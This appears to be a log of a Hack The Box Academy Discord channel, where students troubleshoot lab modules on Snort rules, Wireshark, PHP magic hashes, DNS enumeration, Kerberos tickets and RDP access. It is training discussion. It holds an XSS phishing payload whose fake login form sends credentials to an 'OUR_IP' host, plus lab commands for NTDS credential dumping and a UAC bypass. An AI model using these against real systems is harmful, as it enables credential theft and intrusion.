Manual upload of war file on tomcat works perfectly but got problem running the automated exploit any ideas ?

Should work given that it is an "exercise for the reader" as the module says

try changing the payload type a few times

To what ?

Python didnt work

show payload, then you can pick what makes sense

u sure?

could be payloads

no such command in the help section, maybe u mean handler?

try a few, both staged and stageless, I had this issue with metasploit exploit in the past and switching the payload and/or targets around a bit makes it work

you are ending up at /images content. both pictures are same.

for detection, if it is in 12 bytes of packet payload. it is detected. could you rephrase your question here?

Yeah, thats highlighted, but the packet starts at 00, the highlighhted portion starts at 003B if i have my hex counting correct

the "11th" byte in the 0030 row

which is greater than 12

im trying to filter in wireshark at the moment to see if it squares with the snort rule, the other content triggers may be causing me some confusion in squaring each rule with its trigger

that's a good understanding, i did not use wireshark for checking. i understand you now. lemme check

yeah its odd im pretty far out of my comfort zone with this i dont even know how to count in hex good

or like how to properly specify locations in hex, thus my statement: "11th byte of the 0030 range"

@quiet trout can you copy paste provide me those image's hex representation, like they did in modules?

sure, taking me a sec trying to get this shit straight i just set up the vm again, all that info was from yesterday

@exciton there yet? i think i got the issue.

i just need those hex values to confirm.

a bit of a nudge on the geting started module public exploits i got the exploit ready and i can't run it

pls help me in

windows prv escalation : Citrix Breakout

Submit the Administrator's flag from C:\Users\Administrator\Desktop
I conncected with smb my tools and execute ps1 files then found .msi file, but I dont execute that

then I tried to : Bypass-UAC -Method UacMethodSysprep
but not worked pls help me I can't that

i think i found it while getting the packet info.

here's the stripped down version of the rule, with just the 12 bytes and content:/images/

https://pastebin.com/9PkzgMw8

line 84 shows tcp PAYLOAD, similar to how it refers to in the exaplanation (packet payload) on the lab, i suppose the first 0x3a bytes are part of the tcp header and not paart of the PAYLOAD, i didnt take this into account, as i thought the "packet payload" (tcp payload) was all the bytes. seems to be a confusion on terminology and what it meant specifically.

man im gonna have to go back thru these modules better understanding this stuff now and really take a closer look at what these rules are doing, this kinda sucks

you are right about that. however there is another thing to consider, not exactly in this case but this rule is inefficient since it misses HTTP sticky buffers, that could also lead to fragment HTTP requests or responses across multiple packets. If the relevant string is split across packets or if you miss part of it. it can also avoid detection.

it's good to refresh these concepts back, I literally thank you.

yeah, that was a few sections back, im gonna have to look that over again, and how it affects rule creation/trigger

you are really grinding slow and deep. It is good. CDSA is not a long path, so study in depth.

same, i gtg too. i hope i was helpful. see you later man.

guys pls

also, you gonna be stuck in snort module during assessment. i guess.

SWEET

looking forward to it already

its really stupid.

but again good luck

bye. gtg

hey thanks for helping a sanity check i do APPRECIATE the heck out of it

i was about to give up before you helped out now im somewhat reinvigorated to finish this hsit

anyone know why this wireshark filter isnt working?

this is so freaking fundamental it blows my mind, and its not working

if i change the filter to just frame.len == 9 or frame.len >= 9 && frame.len <= 10 that also ails

try udp.length

The frame is TCP.

err... the frame is IP

that failed to it has to do with the payload being 9 bytes and the datagram being much larger, but im still getting very odd results... a filter like udp.length == 17 should in "theory" work? dunno still getting a blank output

the wireshark output is throwing me off len = payload size, not packet size

but the snort rule is saying "content: 9" which is referring to payload size, im trying to cross reference a snort rule with expected output in wireshark line by line but im getting kinda fucked at every turn

both filters "work" im just not doing it correctly

Hey guys do yu know if there is a plugin or something on obsidian for finding text on images?

and the section isnt really explaining how to cross reference this like im trying to do, to fully understand it instead of just "trust me bro"

so TLDR: skill issue

Yeah I can't help with any of that regarding the module -- haven't been there-- just that if you're trying to filter on the udp length, use udp.len. frame.len refers to the IP frame.

i see, defo gonna remember that

@shut vapor think you can help me better understand the contents of this UDP packet? from what i've read the UDP header is 8 bytes, the payload is the highlighted section an additional 34 bytes further along... not sure what the other 24 bytes are?

nvm

its other headers and stuff

not sure how that squares with this image which suggests the headers should equal 8 bytes, but ... iono...

Hi everyone. Do you guys know why is this evaluated as false? I'm doing the Type Juggling Auth Bypass from the Whitebox Attacks module in CWEE. I managed to solve the challenge, but this idea of magic hashes confuses me. Does it only work in PHP versions below 8.0.0 as well? Thanks!

Hey, im in the footprinting module inside the DNS page
I'm a bit confused of what answer i should give in this question Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

I think i understood:
they wanted me to find the ||namserver|| of that domain?

hello, about the sliver module; can u use armory modules without a beacon ?

The FQDN of the name server is searched for

Thanks

i dont think so, there would be no where to load them

but what about c2tc-domaininfo it just gets domain info ... do u really need a beacon for that ?

it cant just use magic to get access to the domain

U can do it though:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 EDT
Nmap scan report for 10.129.98.244
Host is up (0.074s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       currentTime: 20241013232934.0Z
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
|       dsServiceName: CN=NTDS Settings,CN=MULTIMASTER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL
|       namingContexts: DC=MEGACORP,DC=LOCAL

So why doesnt this C2 automate something that u can do -- isnt that its job

This doesn't look magical at all to me, it just looks like you're comparing two strings that are different from one another. I'll let someone else speak on magic hashes in php. I have no insight.

Where'd the other screen shot go? I was confused by its strcmp() != False double-negative.

Appreciate your help. I deleted the last example with strcmp because I messed that up XD

The "0e123..." expresion should be converted to a 0

im pretty sure c2tc is an authenticated domain search

but whats the problem with using another tool just like that

It might be a stupid question but i believe the module uses that as a vulnerable code

I'm reading about it now, this only applies if you're hashing the value. In your example above you're not hashing it AFAICT, you're just comparing two strings.

Shouldn't the first expression be true, then?

I might be losing it but it might be all about the PHP version in used

give me a minute, I'll try on my end

Sure, you can DM me if you want

Hello,
I'm doing Information Gathering > Subdomain Bruteforcing and I'm running the exact command they give :

dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
All that I get are :
ns1.inlanefreight.com.
ns2.inlanefreight.com.
customer.inlanefreight.com.
And nothing else. If I understand the question correctly :
**Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com. **
I'm supposed to find a new domain name like newdomainname.inlanefreight.com. I tried running the same command on www.inlanefreight.com, ns1.inlanefreight.com, ns2.inlanefreight.com but it doesn't give any result.
I also tried connecting or disconnecting my vpn with no luck, I also checked that I didn't accidently put an entry for inlanefreight.com in my /etc/hosts file. Can anybody hint me in the right direction?

try pwnbox

i got it instantly

The sha256sum is 0e46...., if you want to compare the output of hash() in php, the string you compare it against is just a string of that has value.

what cmd are you running and its output? you've identified the ns's but not what you're doing to enum the directorys and subdomains, not just the nameservers

In other words...

or are you using dns enum? i think that might've failed for me on my attempt at that section you might consider letting it run but also trying something like ffuf or dirbuster/gobuster

also use pwnbox if possible like @safe star mentioned

Ok, then the magic hashes don't really work since we are using loose comparisons. I will read the module again... It was probably changed in 8.0.0

Thanks for your help. Appreciate it

I'll try it out

The command I'm running is in my message, and the output is a few of the already known addresses. I have tried to run the command on subdomains like www.inlanefreight.com etc... but that gave me an error

yes I am using dnsenum, I'll try the pwnbox and if not successful will try gobuster ffuf etc.... thanks for your answer!

yeah the dnsenum tool according to its man page is for enumerating dns servers primarily, it looks like it has some limited functinality for finding subdomains based on the DNS records but i dont think i had very much luck with this, and better tools exist for the purpose, something to keep in mind for real world

Here is a full example of what they're trying to convey:

If you hash a value and the result begins with "0e", testing the result against 0 returns TRUE.
The next test I performed was to change the value I'm hashing so that it doesn't result in a hash starting with "0e" and it doesn't work the same way.

Okay so just for the information, I just ran it on the pwnbox and indeed it worked perfectly instantly. For some reason it doesn't work when I run it on my machine. No need to bruteforce subdomains just inlanefreight.com
I guess that's kind of a bug or something

Hi guys, I am doing the windows fundamentals module and I am trying to connect via RDP to the machine but I was getting errors. I tried to ping the machine and i got host is unreachable as a result. What can i do to resolve this issue and manage to connect to the server?

1. ur VPN is working?does it say connection established?
2. IP is correct ?

I got it, but the module gives a vulnerable code that compares it to the user's password from the database (not a zero). They mention multiple times that things changed with 8.0.0, but not when talking about magic hashes and that confused me. I hope we both learnt more about magic hashes XD. Thanks, though.

Vpn works, it says sequence completed so it works. and Ip is correct, i literally copy pasted it

can u refresh page and see if ur lab is still online

hi

It is, 111 minutes left

how can i chat on the normal chat??

it work before? is this new

#general

it says i dont have perms

If it didnt work before, that means ur network has a firewall rule to stop the TPC or UDP, so try a different type of VPN

No it didn't, i am literally at the first module

Please read #welcome and #rules it will explain how to get verified

ah so donwload tcp instead of udp then?

But btw if u want professional to help u with this then start a ticket on the website

kk

So in Lateral Movement Skills Assessment, Q2 asks for the flag.txt on Arturo's Desktop... Well I'm on Arturo's Desktop, and there be no flag.txt??? What gives? Anyone have any ideas?

how do you raise a ticket on discord btw? I usually dont use discord

in the Cross Site Scripting section of BBH, specifically the Phishing portion. I am having quite a bit of trouble with the attack.

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

the payload doesn't actually remove the form it also doesn't accept the document.getElementById i always see the broken link and

');document.getElementById('urlform').remove();

is there something I am missing here?

If u have a casual question or question that other students can help then u can use discord.

But if u have a problem with the connection or something wrong with the lab then u make a ticket on the website there is a green circle (bottom right) to make a ticket and message HTB support

Ah on the website itself, gotcha thanks!

There isn't only one Host in that environment, right!? 🤷‍♂️

That SA is pretty structured in a way that you have to jump from one Host to another

okay, I'll try to come at it another way

Support is via website only

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Anyone know why I cant access the TestGroup share after adding pedro to the group and logging out and back in for DACL Attacks 1: AddMembers module?

I was able to get administrator on the target but am still stuck on the first flag

idk if you still need help. but the open button is way down at the bottom of the window, if you cannot see it, expand the application gui window by whatever means necessary.

Thanks. I will knock it out now.

Have you read your output?

yes what about it?

lol am I trolling here?

Doesn't look like you added yourself to TestGroup

oh wait Im trolling

thanks

I though backup operators had read on testgroup

not the actual group "TestGroup"

Think you have to abuse "Backup Operators" membership next

gotcha, yeah jumped the gun a little bit

thankyou

Try reading and executing the same steps as the Evasion Section

i read it and i believe i am already doin that

It's pretty much copy and paste

You found the Port

What command did you use to connect to the port you've found?

i am not really sure why none of this is working @dapper moth

Use sudo

Got the flag?

for god's sake all i was missing is sudo for past 1 hour 😂

yes thankyou very much

Ok, I will respond to my own comment. They indeed give a very clear explanation on how strings are handled after 8.0.0 when doing loose comparisons. Reviewing the module and completing the next section while debugging locally cleared my mind. I try to avoid asking on the Discord server because I always feel dumb when looking at my comments... I guess it's part of the learning process.

Hi guys, i am confused how i should be able to answer the question of the module introduction to bash scripting, submodule: conditional execution if i literally never wrote a bash code before. The explanation in that module is not enough if you have never done bash scripting before. Feels like a lot of modules try to teach you one thing and then the question is something completely unrelated or the module itself didn't give you everything to be able to answer the question. Or is it me?

anyone having issues spawning machines?

nvm its working

HTB Academy is tough. If you come from other platforms, everything feels like a capstone exercise XD. Feel free to send me a DM if you still need help 🙂

true

Hey i'm doing Login Brute Forcing and I was wondering if there's a recommanded wordlist for password and username ? I know some module have them in the ressources tab but it seem like theres nothing for this and I don't want to be bruteforcing for 1h

Pretty sure it's rock you

i don't think it's tough per se, not what i encountered as of yet at least, the problem is that the explanation in some modules is unclear/expect you already know something/is not in a chronological order/or they explain what 1+1 is and the question pertaining to that module is: How many donkeys are alive in Australia? But thanks for the help, i figured parts of it out with chatgpt

If they use something specific in the examples try to use that, otherwise rockyou is a good shout. If it doesnt go through in like 5 mins try something else, nothing should take hours to bruteforce

Good evening everyone

Some of the Skill Assessments are to make you research or to be challenging.

Wait till you go up the higher tier modules

I don't complain though

Eh the skill assessments actually moreso test your ability to apply the knowledge

Id say rarely they require too much additional research

Again, depends on the module

I think I've ran into one maybe two modules that required external research bc it wasn't covered, or wasn't covered well

Hi I stuck on LDAP assessment last question. what is the non default privilege of htb-student? any nudge? I tried to run elevated powershell, it didn't work..

Linux Fundamentals is actual trash holy hell 💀

The RegEx topic literally says "here is how you use an extension, now magically know every part of regex"

Why include practice questions for something you were too lazy to put an explanation for

Ik it just takes a quick search or use of ai to get answers but its very frustrating when you pay for a service to teach you and you were too lazy to put a block of text explaining the necessary topics instead of quizzing us on topics not fundamentally covered at all

Idk this just feels insulting at this point

Are all the modules like this? Like beyond Linux Basics? If so I'm refunding asap

what are you talking about, the regex part of linux fundamentals doesn't even have any questions on it

just click "mark complete & next"

Cant upload a picture but there are optional questions too

Please dont use the defense that making them optional means you don't have to cover whats necessary to produce the results that are being asked for

it's not possible to include every single bit of information for everything that's covered in every module, that would make them too insanely big. a big part of pentesting is doing research and being able to learn a new tool or app quickly. i'd say the overwhelming majority of the modules are self contained and don't require outside knowledge, but some of them do expect you to have a certain baseline level of knowledge regardless.

Literally just including \b and \w* I dont see how that would make it extremely large. Just lazy

you're conflating stuff too like 'Know every part of regex', those simple exercises aren't even close to 'knowing everything'

I dont see how large modules are supposed to be an issue security isnt supposed to be a simple topic it requires you to know a lot of concepts and when/how to employ them. So what if theres a lot to read lmao if people have an issue with that they probably should go work as a fast food worker.

My concern is coming that there may be a trend of questions that are simply outside of what is covered, not a clever stretch just concepts as a whole.

not seeing anything in the optional exercises that aren't covered

regardless you'll need to do that for pentesting, a lot.

I don't see anything that will specifically pull for words starting/ending with a word. Only containing

did you not complete the previous sections?

I did

a lot of modules build off each other like that

it's covered in a previous section

was that it... or do you feel like something else wasn't covered?

I ended up just using what I had searched up so I'm unsure. Looking back the only thing I saw was the use of a caret

oh ok. you seemed pretty upset over it so i thought it would be more or something. yeah i found it in the find files an directories section

literally says -name *.conf With '-name', we indicate the name of the file we are looking for. The asterisk (*) stands for 'all' files with the '.conf' extension.

Yo! Does anyone ever get this error when using crackexecmac and netexec , I get this error in Password attacks module , I already remove and reinstall both tools but no luck with this error..

┌──(parallels㉿kali-linux-2022-2)-[/media/psf/Share Folder]
└─$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --ntds
Traceback (most recent call last):
  File "/usr/bin/netexec", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/usr/lib/python3/dist-packages/nxc/netexec.py", line 143, in main
    protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
                              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/nxc/loaders/protocolloader.py", line 16, in load_protocol
    loader.exec_module(protocol)
  File "<frozen importlib._bootstrap_external>", line 995, in exec_module
  File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
  File "/usr/lib/python3/dist-packages/nxc/protocols/smb.py", line 10, in <module>
    from impacket.examples.secretsdump import (
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 69, in <module>
    from impacket.ldap.ldap import SimplePagedResultsControl, LDAPSearchError
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 41, in <module>
    import OpenSSL
  File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
    from OpenSSL import crypto, SSL
  File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1579, in <module>
    class X509StoreFlags(object):
  File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1598, in X509StoreFlags
    NOTIFY_POLICY = _lib.X509_V_FLAG_NOTIFY_POLICY
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'. Did you mean: 'X509_V_FLAG_EXPLICIT_POLICY'?

probably because you didn't wrap the password in quotes, it contains special characters.

hey hey stay. u solve it?

seems like a dependency problem tbh

I would do a clean reinstall with pipx

yeah could be

Hello

there are plenty of people here who can help, which module/section/question are you stuck on?

How do u guys learn to hack

academy

Kinda perplexed as to what's happening here.

I'm in Web Attacks Skills Assessment.

I'm at the very last step, trying to obtain my base64 hash.

I used a malicious XXE payload so I can read the flag file.

I made the necessary adjustments, and hit send in the web developer.

All I'm getting is "Event " has been created" in the Response tab. So I know the code worked, but I'm not getting the base64 hash so I can grab my flag.

Any help?

of course

probably best to chat about it in #general this channel is for the modules on the academy

read and follow the instructions in #welcome

this is not the place to ask for help for this sort of thing

as i said, read and follow the instructions in #welcome

no one here is going to help you get your account back or something, this discord is about the hackthebox platform, your only recourse to get your account would be to reach out to the service who provided it.

@remote ice as has been said above, read #welcome, read #rules. Contact support for your "game"

I did it

If you want to take part in the community of Hack The Box, great, follow the instructions in #welcome. If you just want to wave your arms about a "hacked account", then just leave.

anyone around i can dm about skill assement 1 on login brute forcing?
for a sanity check. I try it the way learned in the module and using recommended password list and passnot found.
tried using recommended password and user list and its saying 38 hours to run

nm got it

Helpful hint for other users verify after downloading wordlists that they downloaded correctly. Lol

reset the target machine and try again.

Hello 👋

hi

Hi

type shi

is the CORS misconfig question working for you

It worked once, not sure how because I couldn’t reproduce

#1234357888114364508

Made a post already, think the module is broken

what about the seciton before

What

the previous section, CORS Misconfigurations

without the csrf token

I already answered that nerd

^

great

Not great

I quit the module because of it

ok I managed to solve it but one part isn't really mentioned

also I have to include the port number unlike the previous section or else it goes to 443

Hello everyone help me pls

Windows Privilege Escalation : Interacting with Users

Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

I need to put smb share my .scf file but there is no writeble folder for me

pls give me some hint

With port number still failed for me

I think the only time it worked was when I removed the ports

wtf

yeah some weird stuff is going on

Yeah

It annoyed me that it didn’t work even though my payloads were correct

So I just skipped the module

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

there are writeable folder, look through all of them

there can be subfolders

Let me know if that next section works for you

And what your payload is

I cant find I tried to public folder but not worked

did you mean in smbclient ?

there are other places than public

I'd suggest using impacket's smbclient.py or smbclient-ng

https://github.com/p0dalirius/smbclient-ng

HI

Password Attacks > Pass the Ticket (PtT) from Linux

Q/ Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

i have the ticket of julio but i cant access with smbcclient

smbclient //dc01/C$ -k -no-pass

root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_6######_######
Default principal: julio@INLANEFREIGHT.HTB

Valid starting Expires Service principal
10/07/2022 11:32:01 10/07/2022 21:32:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:32:01

anyideas ?

find a ticket that's valid

it worked thank you so much

thanks i will try

Hey!
I'm stuck in Footprinting page SMTP
The question is Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Tried to run the command ||smtp-user-enum -M RCPT -U ./footprinting-wordlist.txt -t 10.129.19.215||
And I get 0 results
The wordlist is the one under the resources, so it should be updated

I dont understand, It worked on metasploit but not on smtp-user-enum
Why is that?

maybe you using the wrong smtp command?

lol the example in the section worked for me, had to add the port otherwise it's the same

had to use the burp browser to test tho, for some reason the script isn't being loaded in firefox

Maybe that’s the issue then

As I’m doing it from Firefox

hi, could someone tell me what the answer format is for section "identifying hashes" on module: cracking passwords with hashcat.

Can you dm me your payload and post req?

what do you mean?

have you tried using VRFY instead?

yes

metasploit worked and smtp-user-enum didnt

a bit weird, maybe its not reliable tool

does anyone know why, in intro to network traffic analysis i keep getting this error when trying to start the capture "tcpdump: ens3: You don't have permission to perform this capture on that device
(socket: Operation not permitted)"

i also get tcpdump: option requires an argument -- 'i'

even when im using -i. straight out copy pasting it from the solution

run as sudo?

then i get the requires an argument -i

even if i use sudo tcpdump -i #3

even this question, which i answer with -| gives me incorrect "What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as 'grep'?"

#3 is not an interface name

Bro There is nor writable folder

ok say i use lo

which is number 3

the answer is -1 not -|, can anyone explain that to me

neither of those are the answer, read the manual?

i literally got a successful answer using 01

-1

it's -l not -1

Hey, a question about SNMP page under Footprinting
I've found the answer to all of the questions, but on the last question Enumerate the custom script that is running on the system and submit its output as the answer.
does snmp provides the output of commands executed on the device?
I didnt fully understand why I saw the script, and the output of it under the snmpwalk

Do you still need help?

I flipped and it worked

Nah I got it. Was doing the r8ght thing but had a bad download on the user and pass wordlists.
Re-download them and reran and was gold.

https://academy.hackthebox.com/module/144/section/1251 I already completed this module however im trying to re cap on stuff however i cant replicate the answers i got before is it because the DNS servers have probably been updated?

No that should not be the case. Show us your terminal cmd and output for each exercise (i think there's only 3?)

copy paste from terminal window

im doing the skills assessment from web proxies and I put in the URL and the page is just blank
I reset the target twice now

1. dig inlanefreight.com

; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> inlanefreight.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43608
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;inlanefreight.com. IN A

;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248

;; Query time: 20 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 14:59:05 BST 2024
;; MSG SIZE rcvd: 62

2. dig -x 134.209.24.248

; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> -x 134.209.24.248
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62366
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;248.24.209.134.in-addr.arpa. IN PTR

;; ANSWER SECTION:
248.24.209.134.in-addr.arpa. 1800 IN PTR inlanefreight.com.

;; Query time: 96 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 15:01:36 BST 2024
;; MSG SIZE rcvd: 87

3. dig MX facebook.com

; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> MX facebook.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63906
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;facebook.com. IN MX

;; ANSWER SECTION:
facebook.com. 1782 IN MX 10 smtpin.vvv.facebook.com.

;; Query time: 16 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 15:02:31 BST 2024
;; MSG SIZE rcvd: 68

@quiet trout

you got it, the answers are there are you having trouble parsing the output?

None of those answers are the same as what i entered last time for example the ip address for inlanefreight was 204.74.99.103

oh in that case yes, the DNS has changed

okay thankyou i was just confused thats all

╰─ dig inlanefreight.com                                                     ─╯

; <<>> DiG 9.18.28-0ubuntu0.24.04.1-Ubuntu <<>> inlanefreight.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36377
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;inlanefreight.com.        IN    A

;; ANSWER SECTION:
inlanefreight.com.    300    IN    A    134.209.24.248

;; Query time: 79 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)
;; WHEN: Tue Oct 15 09:07:36 CDT 2024
;; MSG SIZE  rcvd: 62

ur vpn all good?

ah

its prolly cuz u need to visit the right directory

like /lucky.php for the first exercise

You can configure SNMP to return the results of a script... but usually a lot of other stuff.

If you think working with snmp agents is weird, don't look at the config for snmp managers. Oof. 😅

Yes It did change

Currently doing Kerberoast attack module. I'm stuck at
||Unconstrained delegation - Computers question no.2 as you can see the Ticket is already loaded but still failing to read the flag.|| Can someone help me?

try using the fqdn

One message removed from a suspended account.

One message removed from a suspended account.

fqdn where exactly? while reading the flag?

Best to ask in #programming

read and follow #welcome

this is because of whatever you used to write it has created a partition that the image was written to, if you're doing this in windows use the disk management tool, if you're doing it in linux use gparted

a lack of sig in windef

Still getting this error? Can you elaborate more @next bronze ?

which ticket did you import? dc01's?

Yeah after performing the printer attack

Also can I DM you to avoid any spoilers here in the chat?

so what's the step after gettting dc's tgt in the module?

It says dcsync to get hashes of the users but I'm not able to perform dcsync

why not

Wait let me try the attack once again and get back to you

I didn't fully understand what is the difference between information schema and system schema and when we use it
(Related to MySQL)

or would i need to see traffic on the router for that info?

and/or traffic on the dns server?

would anyone be able to help me with the cicada machine?

#boxes

#welcome

on Attacking Common Services - Easy

i have creds but when i auth by using mysql i got this

mysql -u f#### -p####### -h 10.129.203.7
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1129 - Host '10.10.14.128' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'

does anyone know this

doesn't look familiar and I haven't got any notes suggesting I had to adjust how I connect to mysql for that assessment. Make sure the system is still up and the port is still open. You can try the "flush-hosts" command suggested or restart the lab even.

ping 10.129.203.7
PING 10.129.203.7 (10.129.203.7) 56(84) bytes of data.
64 bytes from 10.129.203.7: icmp_seq=1 ttl=127 time=162 ms
64 bytes from 10.129.203.7: icmp_seq=2 ttl=127 time=162 ms

I also tried rdp but nothing

i solved it

mysql -u ##### -p######## -h 10.129.85.156 --skip-ssl

I'll note it down. it could've been something I just tried and worked & forgot about it

guys i am struggling with a HTB's problem about connections , please if anyone can help with this one .About module Windows :Attacks and Defence , cant connect via kali and then rdp to the static ips

depending on the section you're working on, you can't RDP/SSH to Kali

i am struggling like 1 week now

yes on the section etc, PKI - ESC1

i want to RDP to the windows static machine via the kali (hack the box's kali ip)

i get the error : Authorization required, but no authorization protocol specified
[13:09:34:412] [3025:3025] [ERROR][com.freerdp.client.x11] - failed to open display: :10.0
[13:09:34:412] [3025:3025] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

every time , yes i did the step correct

are you SSHed to Kali?

no rdp

cause its reccomended to rdp to kali if we gonna rdp then to another machine

you can try doing X11 forwarding

static ips dont connect even under my kali with vpn file

can you explain ?

SSH into Kali with the -X option

okey

then try RDPing to WS001

i am gonna be back with the results

thanks a lot by the way

https://academy.hackthebox.com/module/18/section/1776

Oh GOD

It WORKED

Take my money bro

nice

do i need to have an external wifi adapter to complete Wi-Fi Penetration Testing Basics htb?

too fast , lol i didnt worked , it closed and now i get the same error